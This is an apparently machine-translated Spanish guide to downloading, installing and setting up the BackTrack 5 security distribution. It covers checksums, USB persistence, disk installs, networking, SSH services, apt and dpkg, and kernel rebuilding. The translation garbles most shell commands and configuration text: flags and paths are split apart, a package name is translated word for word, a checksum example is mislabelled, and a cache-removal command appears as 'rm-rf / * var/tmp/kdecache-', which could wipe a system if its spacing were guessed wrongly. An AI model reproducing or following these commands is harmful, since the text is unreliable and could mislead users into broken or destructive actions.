Está en la página 1de 108

Introduccin

Descarga de BackTrack - Instalacin de BackTrack - Instalacin de VMware Tools - Uso bsico - Instalar
VirtualBox

Descarga de

Contenido
[hide]
1 La
descarga
BackTrack
2
Verificaci
n de la
descarga
en Linux
3
Verificaci
n de la
descarga
en
Windows
4
Verificaci
n de la
descarga
en OSX
5 Notas
Importante
s
6 Qu
sucede
despus?

Descarga de BackTrack
Con el lanzamiento de Backtrack 5 que ahora soportan 32 bits, 64 bits y ARM. Backtrack 5 viene con dos
gestores de ventanas principales - Gnome y KDE. Usted puede optar por descargar la pgina ya sea una
imagen VMWare o una imagen ISO de inicio (recomendado si ejecutar Backtrack desde un LiveCD o una
unidad de disco duro / USB). Por favor, use nuestras rplicas oficiales para descargar BackTrack. Estos se
pueden encontrar en la pgina de descarga . No utilice un gestor de descargas con nuestros vnculos como
la descarga es muy probable que se corrompe.

Verificacin de la descarga en Linux


Una vez que haya descargado BackTrack5 R2, usted debe comprobar la validez del archivo descargado
usando md5sum. Esto le permitir eliminar el problema ms comn que enfrentan los usuarios de
BackTrack - mal descargado (corrupto) archivos ISO. Para comprobar la suma MD5 de la ISO
descargada, utilice el comando md5sum:
root @ bt: ~ # md5sum BT5R2-KDE-32.iso
38ff62f14cecce5c842df60cbadbdb22 BT5R2-KDE-32.iso

root @ bt: ~ #

BackTrack 5 R2 md5sums ISO se resumen a continuacin para su comodidad.

BT5r2-KDE-64 KDE 64bit md5sum: 6d5996df868dfe9c31aad234187ad7d0


BT5r2-KDE-32 KDE 32bit md5sum: adb7eece8964aab083294f06aa44b625
BT5r2-GNOME GNOME-64 de 64 bits md5sum: 4864e7cacdc35a886ef8264eb346f414
BT5r2-GNOME GNOME-32 de 32 bits md5sum: 4ad5f359bad43bb934d59fcf6632ae1b
BT5R2-GNOME-VM-32 de 32 bits GNOME md5sum: 9a8ec2fb4bbf4a5e626cfeb8970609fd
BT5R2-GNOME-VM-64 de 64 bits GNOME md5sum: dad2f4bf1045c56c0104218fa5d68aff
BT5r3-KDE-64 KDE 64bit md5sum: 981b897b7fdf34fb1431ba84fe93249f
BT5r3-KDE-32 KDE 32bit md5sum: d324687fb891e695089745d461268576
BT5r3-GNOME GNOME-64 de 64 bits md5sum: 8cd98b693ce542b671edecaed48ab06d
BT5r3-GNOME GNOME-32 de 32 bits md5sum: aafff8ff5b71fdb6fccdded49a6541a0

Verificacin de la descarga en Windows


1. Para comprobar el md5sum de su BackTrack ISO en Windows, puede utilizar el programa
gratuito "HashCalc" herramienta de SlavaSoft HashCalc - Hash, CRC, y la calculadora HMAC
2. Una vez descargado, HashCalc abierta, desactive todas las casillas excepto md5 y cambio de
formato de datos a "archivo".
3. En el cuadro de datos en la parte derecha hay un botn con 3 puntos, haga clic en l y vaya a
donde descarg el archivo. Iso o. Bz2 y seleccinelo, haga clic en Abrir y luego en "calcular".
Despus de unos segundos (o ms, dependiendo la velocidad de su ordenador), habr una cadena
de 32 bits junto al md5 palabra, este es el md5 de su archivo.
Compare su md5 con el hash md5 de la pgina de descargas. Si son los mismos, entonces su iso o bz2 es
buena, si no el archivo est daado y hay que descargarlo de nuevo.

Verificacin de la descarga en OSX


Abre la consola y utilice el comando md5 para calcular su BackTrack ISO md5:
revolucin: ~ $ muts md5 BT5R2-GNOME-32.iso
MD5 (BT5R1-GNOME-32.iso) = 49f3dda1e617cb6f4045735766839690
Revolucin: ~ $ muts

Notas Importantes
Los problemas ms comunes encontrados con BackTrack por los recin llegados son:
1. ISO md5sum desajustes, que se traducen en problemas de azar en BackTrack.
2. Medios de comunicacin de baja calidad (en el caso de los DVD), o quemar el archivo ISO a
velocidades que son demasiado altos.
3. Burning BackTrack en un DVD como un archivo en lugar de una imagen de disco.
Por favor, asegrese de comprobar todo lo que era anterior mencionado antes de comenzar un hilo en el
Foro.

Y ahora qu?
El BackTrack 5 imagen ISO es de arranque, lo que significa que usted tendr que o bien quemar el ISO
en un DVD o transferirla a un dispositivo USB. Una vez hecho esto, usted ser capaz de arrancar su
equipo en el entorno BackTrack Live. A partir de este entorno vivo que puede seguir utilizando
BackTrack o instalarlo en su disco duro utilizando una de las guas de instalacin que aparecen en la
pgina de instalacin .

Introduccin

Se instala USB - Instala Disco Duro

Nota Importante
Por favor recuerde que a pesar de que proporcionan estas guas de instalacin para que usted siga, no
podemos ser responsables de que pierdas tu sistema operativo actualmente instalado / s o datos, ya que no
puede dar cuenta de todas las combinaciones de configuracin que pueda tener.
Tambin tenga en cuenta que tendr que adaptar cualquiera de estas guas para su entorno concreto.

BackTrack USB Instalaciones

Instalacin en USB con UNetbootin


Easy USB (en vivo o con la persistencia) Instalar usando el instalador de UNetbootin USB .

Instalacin en USB con cambios permanentes


Backtrack Persistent USB Instalacin

Instalacin en USB con Linux Live USB Creator


Alternativa mtodo de instalacin para usuarios de Windows

UNetbootin USB Installer

Herramientas y Preparacin
Thumbdrive USB (USB Capacidad de la unidad mnima de 4 GB)
Backtrack 5 archivos ISO, md5sum verificado.
UNetbootin - Una herramienta para transferir una imagen ISO en una unidad USB

UNetbootin permite crear unidades USB de arranque en vivo para Ubuntu, Fedora y otras distribuciones
de Linux sin quemar un CD. Funciona tanto en Windows como Linux. Usted puede dejar que UNetbootin
descargar una de las muchas distribuciones soportadas fuera de la caja para usted, o proporcionar su
propio Linux. Iso si ya ha descargado uno o su distribucin preferida no est en la lista. Este mtodo de
conseguir una instalacin en vivo en una unidad USB es el ms simple disponible utilizando Unetbootin.
Tenga en cuenta que vamos a formatear la unidad USB y borrar su contenido.
Nota: ahora se pueden guardar los cambios realizados en el sistema al reiniciar (persistencia).
Descargue la ltima BackTrack iso de nuestra pgina de descargas BackTrack .
Descargar UNetbootin , la ltima versin (Linux, Windows, OSX)

Conecte su unidad USB


Formatear la unidad USB en FAT32
Iniciar Unetbootin y seleccione la opcin "DiskImage" opcin, elija un BackTrack 5 archivo ISO.
Seleccione la cantidad de espacio que se utilizar para la persistencia en MB
Seleccione la unidad USB y haga clic en "Aceptar" para crear un arranque USB BackTrack.

Una vez reiniciado, recuerde que el nombre de usuario y la contrasea predeterminados son root /
toor.

Persistent USB

Contenido
[hide]
1
Herramient
as
necesarias
y
Preparaci
n
2
particiones
3 Instalar
BackTrack
al
Thumbdriv
e
4 Realice
la unidad
de inicio
5
Configure
Persistenci
a
Herramientas y Preparacin
USB Thumbdrive (Mnimo 8 GB, 16 GB recomendado)
Backtrack 5 ISO archivo md5sum verificada, ni un DVD de arranque BT5
Vmware para arrancar el iso si decide realizar todos los pasos desde el interior de una mquina
virtual como lo hice
No importa la forma que elija, pero tened en cuenta que las designaciones de unidad pueden ser
diferentes para usted de lo que eran para m.
Esto puede no ser la mejor manera de hacer esto, pero funciona. Estoy seguro de que hay una manera ms
elegante de hacer esto que yo pueda volver ms tarde si es necesario y permite tiempo.
Particionamiento
Muestra las unidades disponibles con el comando siguiente y determinar qu unidad que desea instalar.
dmesg | egrep hd \ |. sd.

La unidad de destino tiene que ser dividido de la siguiente manera:


La primera particin debe ser una particin primaria de no ms de 3,5 GB y se puso a escribir vfat
(yo he hecho esta particin ms grande de lo necesario a fin de que cubra todo el iso y futuras

versiones). Hacer la particin activa para evitar problemas de arranque.


La segunda particin que almacena los cambios deben ocupar el resto del espacio en la memoria
USB, o tanto como usted desea asignar a los cambios de ahorro (4,5 GB en un mnimo absoluto).
Ejecute los siguientes comandos para realizar la particin.
fdisk / dev / sdb

# Utilice la letra de unidad correspondiente a su sistema.


Eliminar todas las particiones existentes
Command (m for help): d
Nmero de particin (1-4): 1

Crear la primera particin


Command (m for help): n
Comando de accin
e extenderse
p particin primaria (1-4)
p
Nmero de particin (1-4): 1
En primer cilindro (1-522, default 1):
Utilizando el valor predeterminado 1
ltimo cilindro, cilindros o + tamao + {K, M, G} (1-522, por defecto 522): 3.500 M

Cree la segunda particin


Command (m for help): n
Comando de accin
e extenderse
p particin primaria (1-4)
p
Nmero de particin (1-4): 2
En primer cilindro (193 a 522, por defecto 193):
Utilizando el valor predeterminado 193
ltimo cilindro, cilindros o + tamao + {K, M, G} (193-522, por defecto 522):
Utilizando el valor predeterminado 522

Establezca la primera particin a vfat/fat32


Command (m for help): t
Nmero de particin (1-4): 1
Cdigo hexadecimal (tipo L a la lista de cdigos): b
Se cambi el tipo de sistema de la particin 1 a b (W95 FAT32)

Ajuste la segunda particin para Linux


Command (m for help): t
Nmero de particin (1-4): 2
Cdigo hexadecimal (tipo L a la lista de cdigos): 83

Hacer la primera particin activa


Command (m for help): a
Nmero de particin (1-4): 1
Command (m for help): w

En este punto, puede que tenga que extraer y volver a insertar el disco para que los cambios de tabla de
particin para ser reconocido y para que usted sea capaz de realizar el resto de los pasos.
Dar formato a las particiones
mkfs.vfat-F 32-n BT5 / dev/sdb1
mkfs.ext3-b 4096-L casper-rw / dev/sdb2

Tenga en cuenta que la segunda particin debe ser etiquetado como casper-rw exactamente como est
escrito aqu, no hay otra etiqueta va a funcionar, ni siquiera si usa tapones en su lugar.
Instalar BackTrack al Thumbdrive
Montar la primera particin que es sdb1 en este ejemplo.
mkdir / mnt/sdb1
mount / dev/sdb1 / mnt/sdb1

Copie los archivos de la ISO a la unidad USB


cd / mnt/sdb1
rsync-r / cdrom / *.

Este ltimo paso le tomar un par de minutos para el final, quizs ms, dependiendo de la velocidad de
las unidades de disco y el mtodo que est utilizando.

Hace que la unidad de arranque


En estos prximos pasos, hacemos los archivos de memoria USB de arranque y copia en su posicin
correcta con sus nombres correctos.
syslinux / dev/sdb1

Esto ha hecho que la unidad de arranque, pero a medida que haya archivos del isolinux con syslinux
sern nombrados incorrectamente y estar en los lugares equivocados. Fcilmente podemos arreglar eso
con los siguientes comandos.
cp-r isolinux syslinux
cp syslinux / isolinux.cfg syslinux / syslinux.cfg
cp syslinux / isolinux.bin syslinux / syslinux.bin

Configurar la persistencia
Para configurar los modos persistentes en las entradas que queremos, tenemos que hacer lo siguiente:
nano syslinux / syslinux.cfg

Nuestros syslinux.cfg originales se ver as:


defecto vesamenu.c32
prompt 0
Tiempo de espera 300
men de ttulos BackTrack Live CD
men splash.png fondo
men Color Ttulo 1; 37; 44 # c0ffffff # 00000000 std
etiqueta DEFAULT
BackTrack etiqueta men Texto - Modo de arranque predeterminado del texto
kernel / casper / vmlinuz
append file = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrd.gz texto
splash vga = 791 etiqueta STEALTH
men de etiqueta BackTrack Stealth - No activar Networking
kernel / casper / vmlinuz
append file = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrds.gz texto
staticip splash vga = 791 FORENSICS etiqueta
men de etiquetas BackTrack Forensics - No montar el disco o Permuta
kernel / casper / vmlinuz
append file = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrdf.gz texto
splash vga = 791 etiqueta NODRM
men de etiqueta BackTrack noDRM - No hay controladores DRM
kernel / casper / vmlinuz
append file = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrd.gz texto
nomodeset splash vga = 791 etiqueta de depuracin
BackTrack etiqueta men Debug - Modo seguro
kernel / casper / vmlinuz
archivos append = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrd.gz texto
etiqueta memtest
men de etiqueta BackTrack Memtest - Run memtest
kernel / isolinux / memtest
aadir etiqueta hd
men Boot etiqueta del disco duro - arranque del primer disco duro
LOCALBOOT 0x80
aadir -

En mi caso, yo slo quera aadir un nuevo arranque por defecto, que es exactamente la misma que la

entrada predeterminada original con la excepcin de ser mi nuevo modo persistente.


Para hacer lo mismo que usted debe hacer que su syslinux.cfg como la siguiente:
default 0 timeout vesamenu.c32 pronta 300 ttulo del men BackTrack Live CD fondo del men
splash.png ttulo de men color 1; 37; 44 # c0ffffff # 00000000 std etiqueta DEFAULT men
BackTrack persistente etiqueta de texto - Modo Texto persistente kernel de arranque / casper /
vmlinuz append archivo = / cdrom / preseed / custom.seed boot = casper initrd persistente = /
casper / initrd.gz texto splash vga = 791 - texto de la etiqueta etiqueta de men BackTrack Texto Texto de arranque en modo kernel / casper / vmlinuz append file = / cdrom / preseed / boot
custom.seed = casper initrd = / casper / initrd.gz texto splash vga = 791 - STEALTH etiqueta
etiqueta de men BackTrack Stealth - No Networking habilitado kernel / casper / vmlinuz append
archivo = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrds.gz texto staticip
splash vga = 791 - Forensics etiqueta etiqueta de men BackTrack Forensics - No Drive o
intercambiar Monte kernel / casper / vmlinuz append archivo = / cdrom / preseed / custom.seed boot
= casper initrd = / casper / initrdf.gz texto splash vga = 791 - etiqueta NODRM men etiqueta
BackTrack noDRM - No DRM Drivers kernel / casper / vmlinuz append file = / cdrom / preseed /
custom.seed boot = casper initrd = / casper / initrd.gz texto nomodeset splash vga = 791 - debug
etiqueta etiqueta de men Debug BackTrack - kernel Modo seguro / casper / vmlinuz append file = /
cdrom / preseed / custom.seed boot = casper initrd = / casper / initrd.gz texto - etiqueta memtest
men etiqueta BackTrack Memtest - Run memtest kernel / isolinux / memtest append - Sello de
men Boot hd etiqueta del disco duro - arrancar el primer disco duro LOCALBOOT 0x80 append -

Ahora tenemos que probar nuestra nueva modalidad persistente.


Reinicie el sistema desde un dispositivo USB y seleccione "Texto BackTrack Persistent - Boot persistente
Modo Texto" o esperar a que el tiempo de espera para arrancar por defecto. Para probar la persistencia,
crear un archivo en cualquier lugar en el sistema, pero una nueva carpeta o archivo de texto en el
escritorio es una diferencia visual muy fcil de verificar.
Vuelva a arrancar.
Si el archivo est ah despus de un reinicio, han tenido xito.

Mtodo de instalacin

Instrucciones para el BT5 Prximamente.

Instalaciones para discos duros

Instalacin de BackTrack en el disco


Cmo instalar BackTrack en disco

Arranque dual con Windows 7 BackTrack


Cmo arranque dual BackTrack Y Windows7

Instalar BackTrack en disco

NOTA: Se recomienda que tenga un mnimo de 20 GB de espacio en disco libre para instalar
Backtrack!

Arranque el Medio Ambiente Backtrack Live.


En el indicador bash, escriba startx para entrar en la interfaz grfica de usuario.
Haga doble clic en el Backtrack.sh de instalacin en el escritorio
Vamos a pasar por el paso a paso de instalacin:

Seleccionamos nuestro idioma, en este caso Ingls y luego haga clic en el botn Adelante.

Hemos destacado por ubicacin geogrfica (La Zona Regin y Hora) y haga clic en Siguiente.

Elegimos la distribucin del teclado. Vamos a dejar el valor por defecto que es EE.UU. y haga clic
en Siguiente.

Ahora es el momento de particionar el disco, para una instalacin de disco completo que elegir la
opcin "Borrar y utilizar todo el disco" y haga clic en Siguiente.

ADVERTENCIA: Algunas veces el instalador se queda bloqueado en porcentajes de diferencia, lo


dejo por un tiempo, ya que seguir adelante.

Pulse el botn Reiniciar ahora y disfrutar de Backtrack!

Despus del reinicio, puede iniciar sesin con el nombre de usuario root por defecto y Toor
contrasea. No se olvide de cambiar esta contrasea de root por defecto con el comando passwd.
Como se puede ver la pantalla de bienvenida desapareci despus del reinicio. Para solucionarlo
basta con ejecutar fix-splash, y la pantalla de bienvenida aparecer en el siguiente arranque.

Dual Boot BackTrack Y Windows7

NOTA: El siguiente mtodo de instalacin es la ms simple disponible. Lo hemos hecho en el supuesto


de que usted tiene una instalacin de Windows que est ocupando todo el espacio en el disco y que le
gustara cambiar el tamao y crear particiones en el disco duro con el fin de permitir una instalacin
BackTrack junto a su Windows.
ADVERTENCIA: BACK-UP DE LA INSTALACIN DE WINDOWS PRIMERO!
Vamos a pasar por el paso a paso de instalacin:
Seleccionamos nuestro idioma, en este caso Ingls y luego haga clic en el botn Adelante.

Hemos destacado por ubicacin geogrfica (La Zona Regin y Hora) y haga clic en Siguiente.

Elegimos la distribucin del teclado. Vamos a dejar el valor por defecto que es EE.UU. y haga clic
en Siguiente.

Ahora es el momento de particionar el disco, para una rpida y exitosa de doble arranque de la
instalacin vamos a elegir la instalarlas al lado del otro, la eleccin entre ellos cada opcin de
inicio y pulse Adelante ..

ADVERTENCIA: El instalador puede parar en ciertos porcentajes, se deja durante unos minutos y
se reanudar.
Pulse el botn Reiniciar ahora y disfrutar de Backtrack!

Cuando el equipo se inicia, se le dar la opcin de arrancar Backtrack o Windows.


Despus del reinicio, puede iniciar sesin con el nombre de usuario root por defecto y Toor
contrasea. No se olvide de cambiar esta contrasea de root por defecto con el comando passwd.
Como se puede ver la pantalla de bienvenida desapareci despus del reinicio. Para solucionarlo
basta con ejecutar fix-splash, y la pantalla de bienvenida aparecer en el siguiente arranque.

Uso bsico

Contenido
[hide]
1 Inicio de
sesin en
BackTrack
2 A partir
de un
entorno de
interfaz
grfica de
usuario
3 X no
comenzar
!
4 Red
Llegar al
trabajo
4.1
Co
nfig
ura
ci
n
de
la
IP
ma
nua
lme
nte
4.2
Obt
ene
r
una
dire
cci
n
IP
est
tica
a
peg
arse
entr
e
rein

Inicio de sesin en BackTrack


Una vez que la instalacin de BackTrack se hace, el nombre de usuario predeterminado y la contrasea
necesarios para acceder es root / toor.
NOTA: Usted no ser capaz de ver la contrasea mientras la escribe.

A partir de un entorno de interfaz grfica de usuario


Una vez que haya iniciado sesin puede iniciar el entorno grfico con el comando startx.

X no comenzar!
En raras ocasiones (por ejemplo, despus de una instalacin de VMware Tools, o cuando se utilizan
tarjetas de vdeo no compatible), X no se iniciar. Si esto sucede, usted tiene varias opciones que usted
puede intentar para solucionar el problema:
Volver a configurar el paquete del servidor X, se pueden restablecer (y muchas veces arreglarlo)
Xorg configuraciones con el siguiente comando:
root @ bt: ~ # dpkg-reconfigure xserver-xorg

Si est utilizando Backtrack 5 en x64 con KDE debera intentar lo siguiente:


root @ bt: ~ # rm / root/.kde/cache- *

NOTA: A veces, puede que tenga que eliminar tambin las carpetas de cach en / var / tmp ejecutando el
siguiente comando:
root @ bt: ~ # rm-rf / * var/tmp/kdecache-

Obtencin de redes para trabajar


Si usted no ha notado an BackTrack no se inicia con la creacin de redes de forma predeterminada con
el fin de aumentar su sigilo.

Configuracin de la IP manualmente
Primero vamos a configurar la red manualmente. En el siguiente ejemplo vamos a suponer las siguientes
direcciones y su finalidad:
Direccin IP - 192.168.1.112/24
Puerta de enlace predeterminada - 192.168.1.1
Servidor DNS - 192.168.1.1

Para configurar estos vamos a ejecutar los siguientes comandos:


root @ bt: ~ # ifconfig eth0 192.168.1.112/24
root @ bt: ~ # route add default gw 192.168.1.1
root @ bt: ~ # echo nameserver 192.168.1.1> / etc / resolv.conf

Obtener una direccin IP esttica a pegarse entre reinicios


Estos ajustes no obstante slo durar hasta que se reinicie, as que si queremos ahorrar entre reinicios
tenemos que editar el archivo / etc / network / interfaces de esta manera:
# Este archivo describe las interfaces de red disponibles en el sistema
# Y cmo activarlos. Para obtener ms informacin, vea Interfaces (5).
# La interfaz de red de bucle invertido
auto lo
iface lo de bucle de retorno inet
# La interfaz de red principal
auto eth0
iface eth0 inet esttico
direccin 192.168.1.112
mscara de red 255.255.255.0
red 192.168.1.0
difusin 192.168.1.255
gateway 192.168.1.1

Edite el archivo de segn sea apropiado, continuacin, tiene la de redes hecho para arriba
automticamente en tiempo de boot:
root @ bt: ~ # update-rc.d valores predeterminados de red
root @ bt: ~ # / etc / init.d / networking restart

Obtener una IP de DHCP


Con el fin de obtener una IP de un servidor DHCP que puede emitir el comando dhclient <interface> de
la siguiente manera:
root @ bt: ~ # dhclient eth0
Internet Systems Consortium DHCP Client v3.1.1
Copyright 2004-2008 Internet Systems Consortium.
Todos los derechos reservados.
Para ms informacin, por favor visite http://www.isc.org/sw/dhcp/
Escuchando en LPF/eth0/00: 0c: 29:81:74:21
El envo de LPF/eth0/00: 0c: 29:81:74:21
El envo de Socket / fallback
DHCPREQUEST de 192.168.1.112 a 255.255.255.255 eth0 en el puerto 67
DHCPACK de 192.168.1.112 desde 192.168.1.1
obligado a 192.168.1.112 - renovacin en 37.595 segundos.
root @ bt: ~ #

Uso de la secuencia de comandos para iniciar la red


Hay una secuencia de comandos para iniciar la red en el directorio / etc / init.d que intenta iniciar cada
interfaz de escuchar en / / etc network / interfaces (usted puede quitar los que no es necesario). Para
empezar se emita el siguiente comando:
root @ bt: ~ # / etc / init.d / networking inicio

WICD Network Manager


Otra forma de configurar su red est utilizando el Gestor de la Red WICD, usted lo puede encontrar en el
men:
Men> Internet> Wicd Network Manager
NOTA: Tenga en cuenta que al iniciar WICD obtendr un error:
Con el fin de deshacerse de este error se debe reiniciar Backtrack, que antes de comenzar WICD abrir un
terminal y escriba lo siguiente:
root @ bt: ~ # dpkg-reconfigure wicd
root @ bt: ~ # update-rc.d wicd por defecto

Ahora, despus de reiniciar el error no debera ocurrir nunca ms.

Cambio de la contrasea de root


Como ustedes saben Backtrack viene con un nombre de usuario y contrasea por defecto (root / Tur), es
importante que cambiemos la contrasea root especialmente cuando se ejecutan servicios como SSH.
Podemos cambiar la contrasea con el comando passwd:
root @ bt: ~ # passwd Introduzca la nueva contrasea de UNIX: {escriba su contrasea de nuevo aqu}
Vuelva a escribir la nueva contrasea UNIX: {introduzca su nueva contrasea} passwd: password
updated successfully root @ bt: ~ #

Al iniciar servicios
BackTrack tiene varios servicios como Apache, SSH, MySQL, VNC, etc Todos ellos estn desactivados
por defecto. Para iniciar un servicio como SSH, puede utilizar los scripts de inicio. Por ejemplo, para
iniciar el servicio SSH:
root @ bt: ~ # sshd-generate # Especfico para el servicio SSH - necesario para generar las
claves SSH
root @ bt: ~ # / etc / init.d / ssh inicio
A partir de OpenBSD Secure Shell servidor: sshd.
root @ bt: ~ # / etc / init.d / ssh stop
Detencin de OpenBSD Secure Shell servidor: sshd.
root @ bt: ~ #

Si utiliza un servidor ssh, por primera vez en Backtrack tendr que generar claves:
root @ bt: ~ # sshd-generate

Para activar un servicio en tiempo de arranque, puede utilizar el comando update-rc.d, por ejemplo,
tener SSH inicie durante el arranque:
root @ bt: ~ # update-rc.d-f ssh por defecto
Adicin de arranque del sistema para / / etc init.d / ssh ...
/ Etc/rc0.d/K20ssh -> .. / init.d / ssh
/ Etc/rc1.d/K20ssh -> .. / init.d / ssh

/ Etc/rc6.d/K20ssh -> .. / init.d / ssh


/ Etc/rc2.d/S20ssh -> .. / init.d / ssh
/ Etc/rc3.d/S20ssh -> .. / init.d / ssh
/ Etc/rc4.d/S20ssh -> .. / init.d / ssh
/ Etc/rc5.d/S20ssh -> .. / init.d / ssh
root @ bt: ~ #

Comunes comandos apt


apt-get install <paquete> Descargas <paquete> y todas sus dependencias, e instala o actualiza ellos.
apt-get remove [- purge] <paquete> Elimina <paquete> y los paquetes que dependen de l. - Purge
especifica que los paquetes deben ser purgados.
apt-get update Actualiza los paquetes listados en el repositorio, deben efectuarse al menos una vez a la
semana.
apt-get upgrade Upgrades todos los paquetes instalados con las actualizaciones disponibles en el
repositorio. debe ejecutarse una vez a la semana.
apt-get dist-upgrade [-u] Al igual que apt-get upgrade, salvo que la actualizacin dist-va a instalar o
desinstalar paquetes para satisfacer las dependencias.
apt-cache search Bsquedas <patrn> paquetes y descripciones de <patrn>.
apt-cache <paquete> espectculo Muestra la descripcin completa de <paquete>.
apt-cache showpkg <paquete> Muestra muchos ms detalles sobre <paquete>, y sus relaciones con otros
paquetes.
man apt le dar ms informacin sobre estos comandos, as como muchos de los que son de uso menos
frecuente.

Comandos comunes dpkg


dpkg-i <package.deb> Instala un archivo de paquete, uno que ha descargado manualmente, por ejemplo.
dpkg-c <package.deb> Muestra el contenido de un archivo <package.deb>. deb.
dpkg-i <package.deb> Extractos informacin del paquete de <package.deb> un archivo. deb.
dpkg-r <paquete> Quita un paquete instalado llamado <paquete>
dpkg-P <paquete> Purgas un paquete instalado llamado <paquete>. La diferencia entre eliminar y purgar
es que mientras que eliminar los datos slo se eliminan y ejecutables, purga, tambin se eliminan todos
los archivos de configuracin, adems.
dpkg-L <paquete> da una lista de todos los archivos instalados por <paquete>. Ver tambin dpkg-c para
comprobar el contenido de un archivo. Deb.
dpkg-s <paquete> Muestra informacin sobre el <paquete> paquete instalado. Vase tambin apt-cache
show para ver la informacin del paquete en el archivo de Debian y dpkg-I para ver la informacin del
paquete extrado de un archivo. Deb.

dpkg-reconfigure <paquete> Vuelve a configurar un paquete instalado


dpkg Hombre os dar ms informacin sobre estos comandos, as como muchos de los que son de uso
menos frecuente.

Cmo puedo encontrar ms informacin acerca de un comando


especial o el uso de programas?
La mayora de los comandos tienen lo que se llama una pgina de manual (pgina de manual) que se
puede ver escribiendo:
root @ bt: ~ # man <command desea ms informacin ON>

Otro recurso muy bueno en el uso de comandos de Linux se puede encontrar en linuxcommand.org
Algunos programas no tienen una pgina de manual, pero por lo general puede conseguir ms
informacin sobre su uso, escriba:
root @ bt: ~ # <Nombre Slo el nombre del programa sin ningn arguements.

o
root @ bt: ~ # <Nombre-ayuda

o
root @ bt: ~ # <Nombre - Ayuda

o
root @ bt: ~ # <Nombre-h

Algunos programas utilizan otros mtodos, pero son por lo general slo una variacin de una de las
anteriores cinco comandos.

Ncleo

Actualmente no hay texto en esta pgina. Puedes buscar este ttulo de pgina en otras pginas, o buscar
en los registros relacionados .

Cmo se prepara BT5 fuentes del mismo


(Vmare herramientas, conductores, etc)

De vez en cuando es posible que desee compilar el cdigo que requiere cabeceras del ncleo (como
compat-wireless o los conductores de otro tipo). Estas son las instrucciones rpidas sobre cmo hacerlo.
root @ bt: ~ # preparar-kernel-sources
root @ bt: ~ # cd / usr / src / linux
root @ bt: ~ # cp-rf include / genera / * include / linux /

NOTA: Es necesario estar conectado a Internet para poder descargar el paquete linux-source.

PAE kernel

Habilitar PAE en Backtrack5 R2 y R3


NOTA: No cambie ninguna otra configuracin de tu kernel a menos que sepa exactamente lo que
est haciendo!
En este tutorial vamos a proceder a habilitar PAE en Backtrack5 R2.
En primer lugar, preparar nuestro kernel y escriba el menuconfig del ncleo.
root @ bt: ~ # preparar-kernel-sources
root @ bt :/ usr / src / linux # zcat / proc / config.gz>. config
root @ bt :/ usr / src / linux # make menuconfig

Despus de haber lanzado las ncurses menuconfig se procede al permitir PAE que se puede
encontrar en las siguientes: Processor type and features -> Soporte de memoria alta (4) -> 64
GB

Una vez que hemos habilitado PAE del menuconfig que avancemos en la construccin de nuestro
ncleo.
root @ bt :/ usr / src / linux # make guiones
root @ bt :/ usr / src / linux # make preparar

root @ bt :/ usr / src / linux # make


root @ bt :/ usr / src / linux # update-initramfs-u
root @ bt: ~ # update-grub2

Tenemos que reiniciar el sistema y compruebe si PAE est habilitado. (Ajustar la ruta de acceso al
ncleo en ejecucin)
root @ bt: ~ # cat / boot/config-3.2.6 | grep Highmem </ span # CONFIG_HIGHMEM64G no est
configurado CONFIG_HIGHMEM = y

Habilitar b43 conductores en Backtrack5 r2

NOTA: Si cambia las opciones adicionales en las ncurses configuracin sin saber cules son las
opciones se podra romper su ncleo!
Habilitacin b43 conductores en BT5 R2 y R3 se requieren recompilar el kernel.
root @ bt: ~ # apt-get dist-upgrade
root @ bt: ~ # preparar-kernel-sources
root @ bt :/ usr / src / linux # zcat / proc / config.gz>. config
root @ bt :/ usr / src / linux # make menuconfig

Configurar el kernel para utilizar B43 en lugar de los controladores predeterminados brcmsmac
seleccionando la opcin de soporte BCMA. Para acceder a esta opcin, vaya a:
Drivers de dispositivos -> Broadcom especfico AMBA.

Agregue el apoyo BCMA como mdulo, y "Apoyo a BCMA en el bus PCI-host" como se muestra
a continuacin

Salir del men de configuracin ncurses, y construir su paquete kernel:


root @ bt :/ usr / src / linux # make preparar
root @ bt :/ usr / src / linux # make
root @ bt :/ usr / src / linux # make modules_install
root @ bt :/ usr / src / linux # make install
root @ bt :/ usr / src / linux # update-initramfs-u
root @ bt :/ usr / src / linux # update-grub2

Personalizacin de BackTrack

Preparacin BT5 fuentes del kernel


Instalacin de Java
Configuracin FluxBox
Instalar Flash Player
Instalacin de OpenCL

Cmo se prepara BT5 fuentes del mismo


(Vmare herramientas, conductores, etc)

De vez en cuando es posible que desee compilar el cdigo que requiere cabeceras del ncleo (como
compat-wireless o los conductores de otro tipo). Estas son las instrucciones rpidas sobre cmo hacerlo.
root @ bt: ~ # preparar-kernel-sources
root @ bt: ~ # cd / usr / src / linux
root @ bt: ~ # cp-rf include / genera / * include / linux /

NOTA: Es necesario estar conectado a Internet para poder descargar el paquete linux-source.

Instalar Java

Instalar Java
Este artculo fue contribuido por g0tmi1k.
Twitter: ! https://twitter.com/ # / g0tmi1k
NOTA: Antes de instalar Java asegrese de matar Firefox.
root @ bt: ~ # killall -9 / opt / firefox / firefox-bin

Puede descargar Java desde el oficial sitio web . (Descargar versin tar.gz)
En primer lugar, crear el directorio java y lugar all:
root @ bt: ~ # mkdir / opt / java
root @ bt: ~ # mv-f jre1.7.0_05 / / opt / java /

Cambios finales.
root @ bt: ~ # update-alternatives - install / usr / bin / java java / opt/java/jre1.7.0_05/bin/java 1
root @ bt: ~ # update-alternatives - set java / opt/java/jre1.7.0_05/bin/java

Adicin del complemento para Firefox.


root @ bt: ~ # ln-sf / opt/java/jre1.7.0_05/lib/i386/libnpjp2.so / usr / lib / mozilla / plugins /
root @ bt: ~ # export JAVA_HOME = "/ opt/java/jre1.7.0_05/bin/java"

Probando el plugin.
root @ bt: ~ # firefox http://java.com/en/download/testjava.jsp

Instalar Fluxbox

Instalacin FluxBox en BackTrack5


Ahora bien, si usted no lo saba ya, adems de Gnome y KDE BackTrack5 tambin viene con un gestor
de ventanas ms ligero llamado FluxBox, para ms informacin, puede visitar su pgina oficial .
Conseguir FluxBox en BackTrack5 es bonito, incluso el men BackTrack se generan automticamente,
as que vamos a seguir adelante con ella!
En primer lugar tenemos que instalar el paquete de flujo para la espalda, que se agarra todo lo que
necesitamos para conseguir FluxBox funcionamiento.
root @ bt: ~ # apt-get install flujo para la espalda

Despus de que el script est instalado, veremos que iniciar automticamente la configuracin de
Fluxbox.

